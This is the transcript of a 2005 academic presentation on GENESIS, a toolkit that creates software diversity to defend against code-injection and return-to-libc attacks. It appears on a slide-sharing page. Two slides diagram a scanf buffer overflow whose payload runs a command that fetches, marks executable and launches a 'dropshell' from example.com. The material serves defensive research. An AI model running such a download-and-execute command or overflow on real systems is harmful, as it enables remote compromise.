1 / 19

G E N E S I S : A Framework For Achieving Component Diversity

G E N E S I S : A Framework For Achieving Component Diversity. John C. Knight, Jack W. Davidson, David Evans, Anh Nguyen-Tuong University of Virginia Chenxi Wang Carnegie Mellon University. Project Overview. Existing practice: Monoculture Technical objectives:

morton
Download Presentation

G E N E S I S : A Framework For Achieving Component Diversity

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. GENESIS: A Framework For Achieving Component Diversity John C. Knight, Jack W. Davidson, David Evans, Anh Nguyen-Tuong University of Virginia Chenxi Wang Carnegie Mellon University

  2. Project Overview • Existing practice: • Monoculture • Technical objectives: • Exploit artificial diversity to break existing software monoculture • Technical approach: • Artificial diversity at compile, link, load, and execution times • Combinations selectable with toolkit DARPA SRS July 2005 PI Meeting

  3. Project Overview • Major risks and planned mitigation: • Susceptibility to new class of attacks • Deployment issues • Ad hoc evaluation • Quantitative metrics: • Fraction of variants that remain susceptible to attack after transformation • Expected major achievements: • Significant reduction in susceptibility • Task milestones (schedule 12/31/05): • Complete diversity toolkit • Evaluate complete spectrum of diversity techniques DARPA SRS July 2005 PI Meeting

  4. Genesis Diversity Toolkit DARPA SRS July 2005 PI Meeting

  5. Genesis Diversity Generator DARPA SRS July 2005 PI Meeting

  6. DARPA SRS July 2005 PI Meeting

  7. Strong ISR using AES and IT • Randomized Instruction Set Emulation, E. G. Barrantes, D. H. Ackley, S. Forrest, and D. Stefanovi, ACM Transactions on Information System Security. 8(1), pp. 3-40. • Current implementations of ISR execute injected code • Random instruction sequences are executed • Rely on probabilistic arguments that the random sequences will crash harmlessly • Not realistic for critical embedded systems • Recovery of application is difficult/impossible • Vulnerable to attack • Where’s the FEEB?, Ana Sovarel and Dave Evans, USENIX Security Conference, August 2005. • Overhead issues (both space and time) DARPA SRS July 2005 PI Meeting

  8. Strong ISR using AES and IT DARPA SRS July 2005 PI Meeting

  9. Strong ISR using AES and IT DARPA SRS July 2005 PI Meeting

  10. CSD: Calling sequence diversity • Compile-time/runtime technique to create a software population with many different calling sequences • Effective defense against “return-to-libc” attacks (also known as arc injection, Pincus and Baker, IEEE Security and Privacy, 2(4), pp. 20-27) • Return-to-libc does not require injecting code into the application • ISR is not an effective defense against return-to-libc type attacks DARPA SRS July 2005 PI Meeting

  11. Return-to-libc attack Runtime Stack … void bar(int arg1, int arg2) { char buffer[100]; … scanf(“%s”, buffer) …. } arg2 arg1 return addr Saved ebp buffer Buffer Overflow Runtime Stack … arg2 Bad arg wget: http://www.example.com/dropshell ; chmod +x dropshell ; ./dropshell system Saved ebp buffer DARPA SRS July 2005 PI Meeting

  12. CSD: Calling sequence diversity void bar() { … key=Keygen(key, &bar, &foo); foo(arg1, arg2); key=Keygen(key, &foo, &bar); … key=Keygen(key, &bar, &baz); baz(arg); key=Keygen(key, &baz, &bar); … }void foo(int a1, int a2) { Keycheck(key); … Keycheck(key);} DARPA SRS July 2005 PI Meeting

  13. CSD: Calling sequence diversity • Calls to Keygen and Keycheck routines are inserted by the compiler front end (lcc, edg, Phoenix) • At runtime: • Strata generates a key for each function (stored in protected region) • Replaces calls with inline code to generate proper key or check that the key has the proper value DARPA SRS July 2005 PI Meeting

  14. Return-to-libc attack Runtime Stack … void bad(int arg1, int arg2) { char buffer[100]; … scanf(“%s”, buffer) …. } arg2 arg1 return addr Saved ebp buffer Buffer Overflow Runtime Stack … arg2 Bad arg wget: http://www.example.com/dropshell ; chmod +x dropshell ; ./dropshell system Saved ebp buffer DARPA SRS July 2005 PI Meeting

  15. Genesis Diversity Toolkit DARPA SRS July 2005 PI Meeting

  16. Toolkit Execution Environment DARPA SRS July 2005 PI Meeting

  17. DARPA SRS July 2005 PI Meeting

  18. Performance DARPA SRS July 2005 PI Meeting

  19. Progress Towards Metric • Diversity toolkit facilitates: • Creation of large number of variants • Operating, attacking & monitoring variants • Large numbers of variants of Apache created and tested, success rate very high • Disclaimers: • Only one application • Synthetic but realistic vulnerabilities • No statistical significance DARPA SRS July 2005 PI Meeting

More Related